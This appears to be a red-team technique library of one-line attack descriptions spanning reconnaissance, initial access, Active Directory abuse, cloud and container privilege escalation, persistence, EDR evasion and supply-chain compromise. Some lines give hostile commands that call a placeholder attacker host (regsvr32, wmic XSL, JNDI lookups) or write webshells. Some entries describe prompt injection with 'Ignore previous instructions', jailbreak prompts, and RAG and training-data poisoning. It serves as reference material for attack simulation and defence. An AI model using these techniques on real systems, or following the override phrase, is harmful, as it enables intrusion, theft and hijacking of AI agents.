Technique library

Match a public ARN, S3 bucket, or KMS key alias back to its 12-digit account ID — required for cross-account role assumption.

AADInternals / o365recon / GetUserRealm — enumerate tenant ID, federation status, sync state, valid users.

GHunt / Google Workspace email enumeration / iam.googleapis.com TestIamPermissions to confirm project existence.

Brute-force bucket names (S3, GCS, Azure Blob) via wordlists scoped to org name + common patterns; check ACL.

Pull APK, decompile with jadx / apktool, hunt for hardcoded keys, endpoints, debug flags, weak crypto.

arp-scan / netdiscover map the local broadcast domain — first move on a fresh foothold.

Watch CT logs for newly issued certs containing target keywords — discover internal hosts, staging, M&A targets before they go live.

Hunt swagger.json / openapi.yml / GraphQL /graphql, robots.txt, JS bundles — map the API surface area.

feroxbuster / ffuf / gobuster against likely paths and extensions. Finds /admin, /backup.sql, /.git, /.env.

Identify frameworks, CMS, server, JS libs via headers, cookies, error pages, /robots.txt — Wappalyzer / WhatWeb.

Search public repos for org email, internal hostnames, JWT secrets, AWS keys, private keys.

Grep JS for API keys, AWS access keys, JWT secrets, internal hostnames — TruffleHog / SecretFinder.

Publicly served .js.map files reveal the un-minified source, comments, often internal API URLs and feature flags.

Enumerate subdomains via CT logs (crt.sh), passive DNS, subfinder/amass. Expands the attack surface for forgotten apps.

wafw00f / nmap http-waf-* / behavioural probes — informs payload encoding strategy later.

waybackurls / gau pull historical endpoints — often surfaces deprecated APIs still routable.

Register vendor-typosquat, IDN homograph, or cousin domain (rn vs m) — combined with display-name spoof for BEC.

Buy / register domains, VPS, CDN accounts, mail servers — staging infrastructure for the operation.

Force a target machine account to authenticate to attacker — PetitPotam (EFSRPC), PrinterBug (RPRN), DFSCoerce (DFSNM).

NetrDfsRemoveStdRoot forces the target to authenticate; survives EFSRPC patches.

Encrypted File System remote protocol calls coerce SMB or HTTP auth from the target.

RpcRemoteFindFirstPrinterChangeNotificationEx forces the spooler to authenticate to an attacker host.

IsPathSupported / IsPathShadowCopied call coerces the machine account to authenticate.

Trigger the WebClient service to send NTLM over HTTP — relayable to non-SMB targets (LDAP, ADCS).

Default ms-DS-MachineAccountQuota = 10 lets any user create computer accounts — primitive for RBCD, ESC8, noPac.

Malicious content lives in a document, web page, or PDF that the LLM later ingests via RAG / browse tools — injection fires when the model reads it.

Add a rogue Model Context Protocol server to the user's client. Every prompt to the agent exposes tools / data via the rogue server — silent supply-chain for AI workflows.

User-supplied input contains instructions that override the system prompt — "Ignore previous instructions and …" classic.

Hidden instructions inside images (steganographic / faint text) interpreted by multi-modal models — fires when user pastes a screenshot or the agent reads a webpage.

Send convincing fake-IT SMS to an employee, follow up with Slack DMs as 'IT', reset MFA, steal session — Caesars / MGM / Activision pattern (Scattered Spider).

Misconfigured WAF allowed SSRF; SSRF reached EC2 IMDS for instance role; role had ListBucket + GetObject on a major data bucket.

Compromise a script that thousands of CI pipelines `curl | bash` — exfil environment + secrets from every running build for months.

Steal an enterprise IdP signing key from a memory crash dump → mint tokens for any tenant — the 2023 Microsoft / federal mailbox breach.

Bribe / coerce / phish an employee with access to an internal admin panel that can change account email / 2FA — mass account takeover.

Compromise a single engineer's home workstation via outdated third-party media-server software → steal AWS backup keys → exfil full encrypted vault store.

Password-spray a legacy non-prod tenant lacking MFA → discover a legacy OAuth app with full Mail.ReadWrite scope on corporate tenant — read executive mailboxes.

Mass SMS phishing of help-desk / contractor logins across ~130 SaaS tenants — Twilio, MailChimp, DoorDash et al. compromised through one Okta-style phishlet (Group-IB tracked it).

Implant on the build server replaces a source file at compile time so the official signed artefact ships a backdoor — SolarWinds Orion / 3CX-class chain.

Compromise a niche software vendor's update server — every customer pulls the malicious update, mass-spread inside trusted networks.

An old VPN account whose password appeared in a third-party breach is still active and not protected by MFA — direct entry to the corporate network.

Compromise the IdP signing key (via ADFS cert export / Okta admin / leaked cert) — forge arbitrary SAML assertions for any user.

Publish or sideload an extension requesting <all_urls> + cookies + tabs perms — read every site the user visits, exfil cookies.

GitHub Actions / GitLab CI / CircleCI log leakage of AWS keys / kubeconfig / GCP service-account JSON.

An AWS IAM role / GCP workload-identity trusts GitHub OIDC with overly-broad subject (e.g. wildcard repo) — any attacker repo gets the role.

SSH/RDP/Redis/MongoDB open to 0.0.0.0/0 on a cloud instance — bruteforce or unauthenticated access.

Compromised account or leaked Cloudflare API token deploys an attacker Worker — sees every customer request, can rewrite responses on the fly.

Cloud IAM role trusts CI OIDC with wildcard 'sub' claim — any attacker repo / branch / environment can assume the role.

pull_request_target runs in base-repo context with secret access; PRs to a workflow that checks out the fork SHA execute attacker code with secrets.

RDP pre-auth use-after-free on Windows 7 / Server 2008 — kernel RCE without credentials.

SMBv1 pre-auth heap overflow — WannaCry / NotPetya propagation engine; still works on unpatched legacy networks.

Connection-header SMUGGLE to bypass iControl REST auth → command-injection → root on the load balancer.

Pre-auth SQLi in MOVEit's web UI → forge admin session → .NET deserialisation chain → SYSTEM webshell. The Cl0p mass-exfil event of 2023.

Crafted Content-Type header is parsed as an OGNL expression — Equifax 2017 disaster origin.

Default Elasticsearch / Kibana < 7.x with no security plugin — read/write every index, dump all data.

Shodan-indexed MongoDB / DocumentDB on 27017 / 27018 with no auth — full read/write access to every collection.

Org CNAME points to an unclaimed cloud resource (S3 / Heroku / Azure App Service) — register it, serve attacker content under a trusted hostname.

Wildcard A/CNAME with no TLS pinning catches arbitrary subdomains the attacker registers in the parent zone — useful for cookie tossing across siblings.

Forge or manipulate Authentication Results Chain (ARC) headers — downstream forwarders may trust the chain over their own SPF/DMARC check.

From a compromised mailbox, reply to an existing email thread with a malicious link — trust transferred from genuine prior thread.

Mail client shows only the display name in mobile views; set 'CEO Name <attacker@gmail.com>' — most users tap reply without seeing the address.

Resend a legit DKIM-signed message with modified headers / unsigned fields — gateway treats it as authenticated.

Many orgs publish p=none for monitoring — DMARC-aware filters trust the From header without enforcement.

Two From: headers, encoded From, RFC-edge cases — one parser sees attacker, another sees victim. Gmail / Outlook variants over the years.

Permissive SPF (~all / +all) or include: of large permissive ranges lets attackers send mail that passes SPF from an attacker-controlled IP.

SSRF + auth bypass in Exchange CAS — read any mailbox / write to Exchange via /ecp, then drop webshell via WriteFile.

Authenticated SSRF + Remote PowerShell deserialization — requires any user credential, then RCE as SYSTEM.

Pre-auth chain — path confusion + email-to-PowerShell + arbitrary file write = SYSTEM webshell on the Exchange server.

Plug a PCIe card / Thunderbolt device into a locked machine — DMA reads/writes RAM directly, unlocks Windows / Linux / macOS.

Brief physical access lets an attacker modify the bootloader / EFI partition / BitLocker decryption ceremony to capture passphrase or implant.

Boot-time image parsers in vendor UEFI accept malformed JPG/PNG/BMP from the EFI partition — pre-OS RCE before SecureBoot kicks in.

Infusion pumps, MRI / CT consoles, dialysis controllers — networked Windows XP / WinCE devices that ICU networks treat as trusted.

ESXi SLP service pre-auth heap-overflow → root on the host — the bug behind the ESXiArgs ransomware wave.

Repeating vCenter CVEs (CVE-2021-21972 vSAN, CVE-2024-37079 DCERPC heap) — pre-auth path to root, then full hypervisor estate.

Camera / router / NAS / printer ships with admin/admin or a per-vendor hardcoded password — Shodan-indexable, mass exploitation.

Probe JTAG with OpenOCD / Black Magic Probe — full halt/resume + RAM/flash read-write on the SoC.

Public MQTT broker reachable without auth on TCP/1883 — subscribe to # and read every device topic; publish to control devices.

Firmware updates fetched over HTTP without signature check — substitute a signed payload during transit.

Solder onto exposed UART TX/RX/GND headers — typically grants an unauthenticated root shell on consumer IoT devices.

Pre-2018 default + skip-login flag — anonymous access with cluster-admin.

/var/run/docker.sock mounted in a container or reachable on 2375 — full host takeover via docker run -v /:/host.

etcd on 2379/2380 without --client-cert-auth — read every secret in the cluster.

kubelet 10250/10255 anonymous-auth=true — exec / logs / metrics against any pod.

In-kernel SMB server with a rough security track record (CVE-2023-48795 / -3329 / multiple 2024-25) — pre-auth or post-auth kernel RCE over network.

Initiate a device-code flow against login.microsoftonline.com, send the code+URL to the victim — get tokens without a fake login page.

External-tenant chat from a typosquat tenant — attacker phishes via Teams DM with file attachment, often whitelisted by users.

adbd accepting unauthenticated TCP/5555 — `adb connect` from anywhere on the network grants shell as the shell user.

Exported activity / intent-filter with weak validation — craft an intent URL that triggers privileged actions in the app.

Multiple apps register the same URL scheme — attacker app handles a callback intended for the legit app (OAuth code, password reset).

Cards in 'magnetic stripe data' mode broadcast track-2 over NFC — capture, replay to a magstripe-accepting POS.

Wonderware / iFix / Ignition / Movicon HMIs left with vendor-default credentials reachable from the corporate LAN.

Mis-configured OPC UA endpoint accepts anonymous binding — read / write tags, browse the address space.

Reverse-proxy phishing kit intercepts the entire auth flow including MFA challenge; harvests the post-auth session cookie.

Render a fake SSO popup inside the page (looks like a real browser window) — victim types creds into the attacker DOM.

Same as Entra app consent in cloud, generalised — Google Workspace OAuth scopes, Slack apps, Atlassian apps.

Email attachment is a benign HTML; in-browser JS reconstructs a malicious payload from base64 chunks, bypassing email scanners.

Spam push notifications until the victim approves one out of frustration / habit — successful Uber / 0ktapus playbook.

Trick a user into completing a device-code flow on attacker's behalf — gain an access + refresh token without ever seeing the password.

Bounce victims through trusted-host open redirects before landing on attacker domain — bypasses URL-based defences.

Hijack the target's DNS (subdomain takeover / dangling CNAME / registrar compromise) and answer Let's Encrypt's TXT challenge — get a valid cert for that host.

Force the target's origin to fetch /.well-known/acme-challenge/... from an attacker-controlled path — attacker proves control of the hostname they target.

Mass-exploited Confluence + Jira CVEs (CVE-2021-26084 OGNL, CVE-2022-26134 OGNL, CVE-2023-22515 Confluence privesc) — unauth RCE / admin.

Initiate device-flow against github.com/login/device, send code to victim — receive an access token with the granted scopes.

External tenant DMs / Slack Connect channels carry phishing links — many orgs allow external connections by default.

Several VSAT hubs ship with default admin / unauthenticated telnet to the modem's serial passthrough — abused for years by IoT-style mass scanning.

Single-pin / raking / under-the-door tools / latch-slip — common on residential-grade office locks.

Plausible cover story (auditor, contractor, courier, fire marshal) that gets the attacker through human checks — usually combined with physical or phone access.

Proxmark3 / Flipper Zero captures a badge's HID/iCLASS ID at brush-pass range — clone to a blank for unauthorised entry.

Follow an employee through a badge-controlled door without scanning. Carry a coffee, fake props, look busy on the phone.

Drop a Rubber-Ducky / Bash-Bunny / O.MG cable in a parking lot or break room — fires keystrokes / drops payload when plugged in.

Phone call pretending to be IT / vendor / executive — most often used to reset MFA / passwords or extract sensitive info.

Publish a package on a public registry with the name of a target's internal-only dependency at a higher version — npm/yarn prefers the public one.

Push a Docker image with a misleading name (apline:latest) or backdoor a popular base image on Docker Hub.

Publish a package with a near-miss name (lodahs, expresss, requessts) — install scripts fire on every npm install.

Reset maintainer password via dormant email domain re-registration / leaked npm token / dependency confusion — publish a malicious version.

Obtain and abuse credentials of existing accounts.

Use VPNs, Citrix, RDP, etc. exposed externally.

Use vulnerabilities in internet-facing software.

Compromise software, hardware, or service providers used by the target.

Send malicious messages to obtain access.

SIP From / P-Asserted-Identity header lets the caller set arbitrary caller ID — used to make vishing calls look 'internal'.

ASA / FTD WebVPN credential / session-token disclosure (CVE-2024-20353 / 2024-20359 ArcaneDoor) — appliance compromise.

Recurring pre-auth heap overflow / sslvpnd format-string class CVEs (CVE-2024-21762, CVE-2023-27997) — root on the appliance.

Auth bypass + command injection chain (CVE-2023-46805 + CVE-2024-21887 et al.) — pre-auth RCE on the appliance.

Publish a public package with the name of a target's internal-only dependency to trick npm/yarn into installing the attacker version.

Unvalidated redirect_uri / next / returnUrl parameter — used as a phishing aid or to leak OAuth tokens.

Include a remote URL into a server-side include — server fetches and executes attacker-controlled code.

Public-read / world-writable S3 / Azure Blob / GCS bucket — read sensitive data or replace served assets.

Dangling CNAME pointing to an unclaimed cloud resource (S3, Azure, Heroku) — claim it and serve attacker content under the trusted host.

Bypass extension/MIME/magic-byte checks via double extensions (.php.jpg), null bytes, polyglots, content-type spoof.

Upload a server-side script (PHP/JSP/ASPX) into a web-served directory and request it.

Mis-configured WebDAV / IIS lets unauthenticated PUT — drop an .aspx / .ashx webshell.

Single transaction approves every NFT in a collection for attacker spending — the workhorse primitive of wallet drainers.

Spoof the corporate SSID with a stronger signal, present a captive portal — capture credentials from auto-connecting clients.

Listen for client probe requests and reply 'yes that's me' for every SSID — client auto-associates if it was previously joined.

Send victims worthless tokens; the 'claim' button calls setApprovalForAll on their valuable assets.

Tamper with the hardware wallet package before delivery — pre-seeded seed phrase or backdoored firmware.

Enable xp_cmdshell on a SQL server you have sysadmin on — run shell commands as the service account.

Agentic LLM has tools (shell, file, HTTP). Prompt injection in user input or RAG context invokes tools with attacker-chosen arguments.

JavaScriptCore GC use-after-free / mark-stack inconsistency — repeatable on Pwn2Own most years for an iOS / macOS Safari renderer pop.

Firefox JS engine bug in IonMonkey's type-set tracking — leads to incorrect optimisations and memory corruption.

JavaScript bug confuses V8 about an object's shape; speculative JIT load reads from the wrong slot — primitive to addrof / fakeobj, then RCE in the renderer.

JIT bug elides WASM bounds check after PGO — out-of-bounds access from a sandboxed WASM module reaches engine memory.

Update a Lambda's code (lambda:UpdateFunctionCode) — next invocation runs attacker code with the function's role.

Jenkins /script Groovy console reachable unauth or with weak creds — Groovy exec() = RCE as Jenkins master.

User input interpolated into a run: step (e.g. github.event.issue.title) — RCE on the runner via shell metachars.

URL handler in Office documents auto-launches msdt.exe with attacker-controlled command line — RCE without macros.

Magic-byte parsing executes delegate commands — historic vector via uploaded SVG / MVG (CVE-2016-3714 + a long tail since).

JNDI lookup in log4j 2.x — ${jndi:ldap://attacker} in any logged user input triggers JNDI resolution → arbitrary class load → RCE.

Bash function-import in environment variables runs trailing shell commands — exploited via HTTP headers in CGI scripts.

Spring Framework data-binding via PropertyDescriptor → modify Tomcat's logging config → write JSP webshell.

Authenticated query-server config edit allows arbitrary OS commands as CouchDB user — historical but still common in legacy IoT stacks.

Authenticated MySQL root → CREATE FUNCTION from attacker-controlled .so to spawn shell commands.

Authenticated but module-load-enabled Redis → load a malicious shared object via MODULE LOAD — direct RCE as the Redis user.

Authless Redis on 6379 — CONFIG SET dir, dbfilename, then SAVE to write an SSH authorized_key / cron / webshell.

DICOM parsers in PACS viewers have a track record of buffer overflows triggered by malformed pixel data — RCE on radiologist workstations.

.NET Framework signed-binary execution chain for AppLocker bypass.

MSBuild XML with Inline Task runs attacker-supplied C# — works because msbuild is signed and present on .NET-dev machines.

Signed MS host that runs JS / VBS inside an HTA page — common LOLBin for cradle stagers.

regsvr32 /s /n /u /i:http://attacker/file.sct scrobj.dll — remote SCT execution via signed registrar.

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication "; ... — runs arbitrary JS in a signed-binary context.

wmic os get /format:'http://attacker/x.xsl' — proxied execution of an attacker-supplied XSL.

OMVS / USS shell on mainframe — modern post-ex (sh-style commands, file edits) without dealing with TSO / 3270 quirks.

Inject JS into the app process to intercept Java / native function calls — dump arguments, modify return values, bypass auth.

Windows .chm files render with mshta-equivalent privileges and execute embedded scripts.

.application files install + run signed .NET payloads — bypass several typical email filters that scan for .exe.

mshta.exe runs HTA payloads outside browser sandboxing — historical staple still effective on unhardened endpoints.

ISO / IMG containers bypass Mark-of-the-Web — opens as a virtual disk, LNK inside auto-executes a hidden binary.

Embedded VBA in .docm / .xlsm — Microsoft blocks Internet macros by default since 2022 but enterprise allowlists and older systems still bite.

OneNote .one files allow embedded executables behind 'Double-click to view' graphics — a popular post-macro initial access vector.

Vulnerable PIN pad firmware (Verifone / Ingenico class) reachable over serial / USB / IP — escalate to firmware replace, capture every PIN.

Send PJL FSDOWNLOAD or PostScript exitserver commands to the printer over 9100/tcp — write to filesystem, replace firmware, reach root on the controller.

MFP admin web UI with vendor-default credentials / unauth firmware upload — push attacker firmware, persistent root on a quiet network device.

preinstall / postinstall scripts in npm, setup.py in PyPI run during dependency resolution — code exec on the developer / CI host.

Use task schedulers to run code.

Abuse shells/interpreters (PowerShell, bash, Python).

Rely on a user opening a malicious file or link.

Asterisk / FreePBX / 3CX admin panel exposed with default creds or vulnerable to webshell upload — RCE on the PBX host.

User input concatenated into a shell command — separators `;`/`|`/`&&`/backtick-`$()` yield RCE as the web user.

ObjectInputStream.readObject on attacker bytes — ysoserial gadget chains (CommonsCollections, Spring, JRE-only) reach Runtime.exec.

TypeNameHandling.All in JSON.NET, BinaryFormatter, ObjectStateFormatter (ViewState) — ysoserial.net gadgets reach Process.Start.

_$$ND_FUNC$$_ marker invokes eval — node-serialize, serialize-javascript, funcster gadgets.

unserialize() on user input — POP chains via __wakeup / __destruct lead to file_put_contents / system.

pickle.loads on attacker bytes — __reduce__ trivially returns (os.system, ('cmd',)) → RCE.

Inject PHP/JSP into a logged value (User-Agent, Referer), then LFI the log file to execute it server-side.

Polluting Object.prototype in Node lets you set unexpected child-process / spawn options leading to RCE.

Server-Side Template Injection via {{ }} — escape the sandbox via __class__.__mro__ or config.from_pyfile to reach exec.

${} / #{} template expressions reach Java ProcessBuilder via reflection — typical in Atlassian Confluence / Bitbucket exploits.

{{_self.env.registerUndefinedFilterCallback('exec')}} pattern reaches PHP system() / shell_exec.

Add stealth ACEs (GenericAll, WriteDACL, GetChanges) on a high-value object for re-entry.

Modify AdminSDHolder ACL; SDPROP propagates the rogue ACE to all protected accounts hourly.

Long-lived user/computer cert survives password resets — re-auth via PKINIT.

Register a rogue DC and inject arbitrary AD changes via legitimate replication.

Set the local Directory Services Restore Mode admin account to sync with a domain account for back-door logon on DCs.

Inject a startup/logon script into a linked GPO for persistence across the OU.

Insert backdoored examples into the training set — model learns a trigger that produces attacker-chosen output at inference.

Insert documents engineered to dominate the embedding space near sensitive queries — the retriever always picks attacker text, the LLM uses it as ground truth.

Insert documents into the vector DB whose embeddings rank high for sensitive queries — the model retrieves and trusts attacker content.

Compromised extension maintainer account; push a malicious version via auto-update — every existing install runs attacker code on next launch.

Create a stealth IAM user (svc-monitor) with PowerUser / Admin attached for re-entry after credential rotations.

Add a client secret to an existing app registration with privileged roles — survives user-password resets and MFA changes.

Generate a long-lived JSON key for a low-noise SA whose only role is impersonating an admin — stealth re-entry.

Poison Actions cache / Bazel remote cache so subsequent legitimate builds pick up attacker artefacts.

Drop ACTIONS_RUNNER_HOOK_JOB_STARTED on the runner — fires before every future job, grants persistent code-exec.

Implant in the UEFI firmware or ESP — survives OS reinstall and disk wipe; classic LoJax / MoonBounce / BlackLotus territory.

Create / hijack a ValidatingWebhookConfiguration to intercept every API call — credential & secret harvesting.

Create a privileged CronJob or DaemonSet that re-implants the attacker on every node — survives pod restarts.

Push a backdoored image with a benign tag to the cluster's registry — wait for the deployment to pull it on next rollout.

Drop a per-user or root cron entry that re-implants the shell on a schedule.

Append attacker pubkey to ~/.ssh/authorized_keys (or root's) — classic stealth persistence.

User-scoped systemd units fire without root — survive logout if linger enabled.

Permanent WMI event subscription fires arbitrary VBS / JS at logon / interval — classic stealthy persistence.

Legacy macOS cron + /etc/periodic + emond rules — still functional, less monitored than LaunchAgents.

Drop a .plist in ~/Library/LaunchAgents or /Library/LaunchDaemons referencing your binary — fires on every login / boot.

GitHub Action references are tags, not immutable commits — attacker who controls the action repo can mutate a tag (v3) to a malicious commit.

Modify accounts to maintain access.

Create accounts on the system or domain.

Register an unauthorized DC for persistence and data manipulation.

Run code automatically at boot or logon.

Modify the appliance's userspace binaries / re-image partition for persistence — survives a reboot, often patches too.

Create a fresh admin account in the application, ideally with unobtrusive name ("svc-monitor", "audit_ro") — survives webshell hunts.

WordPress wp-cron / Drupal cron / Joomla module — install a benign-looking plugin or scheduled job that re-injects the shell.

Register a per-user HKCU\Software\Classes COM CLSID that shadows a regularly-invoked HKLM class — fires when the system loads it.

Writable XML in Tasks folder or a writable target binary — re-points a privileged task to attacker code.

Drop a small interactive shell (b374k / China Chopper / antsword / r57) and revisit later via HTTP(S).

5GC SBI (HTTP/2 + OAuth between AMF / SMF / SCP / NRF) — misconfigured token issuer / SCP without mTLS lets attacker NF query subscriber data, register new NF.

AA wallet sets a session key with broad target/value/selector scope for UX — attacker dApp uses that session key beyond intended actions.

Create or hijack a Delegated Managed Service Account that lists a high-priv account in msDS-ManagedAccountPrecededByLink — inherits its powers.

Write 'member' attribute to add an account to a group, including Domain Admins.

Self-membership write right — add your account to a privileged group.

Full control on a target object: reset password, set SPN, write any attribute.

Write all non-protected attributes; enables SPN-set Kerberoasting and shadow credentials.

Modify the object's ACL — grant yourself any other right.

Take ownership of an object, then grant yourself further rights.

Write servicePrincipalName on a victim user, request a TGS, crack offline.

Modify a linked GPO (or its files in SYSVOL) to add a local admin / scheduled task on targeted OUs.

Add an immediate scheduled task XML to a linked GPO — fires on next Group Policy refresh on every targeted host.

Create/modify non-protected user, group, computer accounts — staging foothold.

SeBackupPrivilege bypass NTFS perms — copy NTDS.dit and SYSTEM hive offline.

Members can load a DLL through the DNS service (dnscmd ServerLevelPluginDll) — runs as SYSTEM.

SeLoadDriverPrivilege — load a driver, achieve kernel exec on the DC.

Modify a system service binary path, restart — runs as LocalSystem.

Abuse IMPERSONATE permissions to assume sysadmin or another login.

Rename a low-priv computer account to a DC's name, request a TGS as it, then S4U2self to DA.

Print Spooler RCE/LPE allowing SYSTEM execution on remote (or local) hosts.

Compromise a Read-Only DC — its krbtgt_<RODC#> hash can issue tickets for revealed accounts.

Coerce the site server's client-push account to authenticate, then relay or use it directly.

Yannos's SCCM relay chains: relay site server / SMS Provider / MSSQL to gain Full Administrator.

If WSUS is HTTP-only, MITM and serve a malicious signed Microsoft binary to push code on clients.

Reset a DC's machine account password to empty via Netlogon to take over the domain.

Multi-step agent re-reads its task list each turn — injected instruction added to the workspace replaces the goal partway through execution.

Specialist sub-agents trust each other's outputs implicitly — injection into one (browser agent) propagates to a more privileged one (shell agent).

Long-running agent loops drift away from the original task as injected context accumulates in working memory — useful for slow-burn data exfil through tool calls.

Provider returns a token issued for a different RP / scope — overly trusting RP accepts it. The 2016 'IdP Mix-Up' attack family.

Renderer asks the broker process for a privileged capability it shouldn't have — broker performs the action because IPC validation is missing.

Renderer talks to the GPU process; GPU process talks to a vulnerable kernel driver — chain ends in kernel RCE from a web page.

Once code-exec in the renderer, abuse a Mojo IPC handler / GPU process IPC / DRM-tier ioctl to break into the browser broker → host context.

Extension communicates with a native host installed via MSI / pkg / deb — the native host runs with user privileges, often used for password managers / dev tools.

Legit extension with cookies + history + downloads perms is later updated by attacker (after maintainer takeover / sale) — instant fleet-wide compromise.

AttachUserPolicy on self with AdministratorAccess — instant root if the principal has the permission.

Create access keys for a higher-priv user you can target — persistence + lateral.

Pass a higher-priv role to a service (EC2, Lambda, Glue) you can launch — service runs with the elevated role.

Switch a managed-policy default version to a more permissive one — bypass policy-review controls.

Trick a privileged user into consenting to an OAuth app with Directory.ReadWrite.All / RoleManagement.ReadWrite — app gets persistent tenant access.

Assign a higher-priv managed identity to a VM you control, then hit IMDS to assume it.

Microsoft.Authorization/roleAssignments/write on a scope lets the principal grant itself Owner — across subscription / RG / resource.

iam.serviceAccounts.getAccessToken on a higher-priv SA — exchange your identity for its access token.

Create a permanent JSON key for a higher-priv service account — works as long as no key-rotation policy kicks in.

EdgeWorker handlers receive raw request bodies — a token or logic flaw lets attacker code run with the operator's trust.

Default admin/admin or over-broad RBAC lets attackers create Applications pointing at attacker manifests — cluster takeover.

Untagged jobs from any project land on shared runners — read shared runner state (Docker socket, caches) for cross-tenant escape.

Public repos with self-hosted runners — first attacker PR runs on the runner, persists a backdoor for every subsequent job.

Spooler service privilege escalation via attacker driver — full SYSTEM, mass-exploited 2021.

Bribe / borrow veCRV via flash loan within a single block snapshot — pass gauge votes that redirect emissions to attacker pools.

EIP-1967 transparent proxy has admin functions on the proxy itself — a function on the impl with a colliding 4-byte selector becomes unreachable, or vice versa.

Bug lets the attacker call setBeneficiary on a vesting schedule — redirect the entire stream to attacker address.

Drop a payload registered under HKCU\Software\Classes\CLSID — fires when explorer.exe / Office / signed binaries load that COM object.

ApplicationImpersonation, Mailbox Search, or Organization Management role assigned too widely — read any mailbox in the org.

Management Engine running on the platform has separate memory + network stack — historic firmware bugs (Q3'17 chain) yield ring -3 on virtually every Intel CPU pre-mitigations.

Specific guest-to-host escape paths in Hyper-V's hv_vmbus / vmswitch — used in red-team labs and Windows kernel research.

Guest-to-host escape via vulnerable virtual device emulation (VGA, USB, e1000, virtio) — emerges in Pwn2Own competitions almost yearly.

Hammer adjacent DRAM rows to flip bits in a target page — used to escape JavaScript sandboxes, escalate from user to root, defeat ECC.

Linux capability lets the process call mount(); chain with /proc/sys/kernel/core_pattern to RCE on host.

Default seccomp + CAP_SYS_ADMIN lets you write to release_agent, fired by the kernel on host — container escape to root.

runc < 1.1.12: file-descriptor leak across exec; container escape via WORKDIR /proc/self/fd/N during image build.

Mount the host filesystem into a pod (read-write or even read-only of /etc/shadow) — exfil host secrets and pivot.

A pod with hostPID sees every host process — nsenter into PID 1 to break out of the container namespace.

spec.containers[].securityContext.privileged: true — mount the host filesystem and chroot in.

Binary with cap_setuid+ep / cap_sys_admin / cap_dac_read_search — escalate to root via the granted capability.

World-writable /etc/cron.d entry or a script invoked by root cron with a relative path you can hijack.

User in the docker group can `docker run -v /:/host` — chroot in for root on the host.

Local kernel vulnerability — DirtyPipe (CVE-2022-0847), DirtyCow (CVE-2016-5195), nf_tables UAFs.

Member of lxd group can launch a privileged container mounting / — same primitive as docker group.

Misconfigured sudo / cron / service with a relative PATH that includes a writable dir — drop a binary named the same as a called command.

polkit pkexec local privesc to root on practically every Linux distro until early 2022.

Heap-based BOF in sudo's argv parsing — local root on most distros before 2021.

Sudo rule permitting a binary that can shell out (vi, less, awk, perl, python) without password — root shell.

Find an unintended SUID binary (find / nmap / vim / less / awk) — exploit per GTFOBins for root.

Misconfigured permissions on /etc/passwd — add a root-equivalent line with a known hash.

Generic exploit technique: corrupt a PMD entry to alias attacker memory onto a kernel object — works for many bug classes (DirtyPipe-style).

Logic bug in the verifier allows an out-of-bounds memory access by a JIT-compiled BPF program — root from any user with CAP_BPF.

Series of io_uring bugs (2022-2024) — race condition in SQE handling yields a UAF on a kernel object, then ROP / pivot to modprobe_path.

Overwrite /proc/sys/kernel/modprobe to point at attacker binary, then trigger a kernel call that auto-loads a missing module — runs attacker binary as root.

Repeating nf_tables bugs (CVE-2022-32250 / 2023-32233 / 2024-1086) — UAF in nft objects, kernel R/W primitive, root via cred-struct overwrite.

Suspend kernel inside a critical section via userfaultfd → win race conditions deterministically (commonly used for nf_tables, ksmbd).

Application loads a dylib by relative path / weak rpath — drop a malicious dylib earlier in the search order, runs in the app's signed context.

On Apple Silicon prior to mitigation, a user-process could read /var/db/sudo/ts to reuse a fresh sudo timestamp for root without password.

Submit a JCL job under another user's surrogate; the job runs in their security context — privilege escalation classic.

Exported activity accepts an intent extra and forwards it without validation — call privileged internal APIs.

Default 'private' / 'public' RW community strings let attackers reconfigure routers / switches over SNMP — write configs to TFTP, change ACLs, etc.

Take over a GH App with org-wide installation rights — rewrite branches, secrets, workflows across every repo.

A repo's devcontainer + secrets give a Codespace owner privileged tokens — compromise the codespace to harvest.

Exploit software vulnerabilities to elevate privileges.

Bypass UAC, sudo, setuid, etc.

HKLM\Software\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated = 1 — any MSI runs as SYSTEM.

Admin-only HTTP method or function is reachable by a regular user (PUT/DELETE/PATCH, /admin/users).

OWASP API #1 — same as IDOR but on REST/GraphQL APIs; check every resource ID against the requester.

Application loads a DLL by name without absolute path — drop a malicious DLL earlier in the search order.

Admin pages omitted from the menu but still routable when the URL is known (/admin, /dashboard, /internal).

Reverse proxy enforces ACL on the URL; backend rewrites via the header — bypass ACL on /admin.

Endpoint trusts the object ID from the request — increment or replace it to access another user's resource.

Send `role=admin` / `is_admin=true` / `verified=true` in the request body — framework binds it directly to the model.

Tools like JuicyPotato / RoguePotato / GodPotato — impersonate a SYSTEM token via a named pipe primitive (still works for service accounts with SeImpersonatePrivilege).

Service binary path contains spaces, no quotes, and a writable parent directory — drop C:\Program.exe to hijack the service start.

fodhelper / computerdefaults / silentcleanup / sdclt — abuse autoElevate trustees to run as elevated administrator without prompt.

Routing decisions made on Host header — set Host: admin-internal to reach an internal admin app served by the same backend.

Contract delegatecalls user-supplied implementation address — attacker library writes the proxy's owner / admin slot.

Borrow voting tokens via flash loan during a snapshot, propose + vote yourself in as admin, repay loan.

Attacker calls initialise() on the implementation contract (not the proxy) — gain ownership, selfdestruct, brick all proxies that referenced it (Parity Multisig 2017).

Patch LSASS on a DC so every account accepts a master password alongside its real one.

Imperceptibly perturbed input (image, audio, text) misclassifies / bypasses content filters / fools image-recognition.

DAN / Sudo / persona / multi-turn escalation prompts that disable the model's safety alignment, enabling forbidden output.

Patch AmsiScanBuffer in amsi.dll memory to return clean — PowerShell / VBA / .NET runtime emits content unscanned.

RP accepts 'none' attestation — virtual authenticators with attacker-chosen credIDs are accepted as real hardware keys.

MV3 limits inline eval, but extension still uses dynamically built script via chrome.runtime.getURL + injected <script> — bypass-able by malicious site.

Find the real origin IP (DNS history, Shodan SSL cert hash, .well-known) and connect directly — bypasses WAF + caching + rate-limit.

Skip required reviews via merge-queue race, force-push with rewritten history, or via admin-bypass on a stale rule.

Load a signed-but-vulnerable kernel driver (mhyprot, gdrv, rwdrv) — kernel-level disable of EDR callbacks (KernelMode unloads).

After BYOVD admin, unlink PsSetCreateProcessNotifyRoutine / PsSetLoadImageNotifyRoutine entries for the EDR — process events stop firing.

Invoke NT syscalls directly instead of via hooked ntdll exports — skips userland EDR hooks on Nt* APIs.

Use DR0-DR3 hardware breakpoints to set hooks that don't modify .text — invisible to EDRs scanning for byte patches.

Jump to a clean syscall stub inside ntdll's own memory after hook check — preserves call-stack origin, defeats stack-walk EDR.

Process Hacker / kernel-mode driver loads as PPL via abused signed binaries (PPLDump / PPLMedic) — read LSASS even when WDAC PPL is enabled.

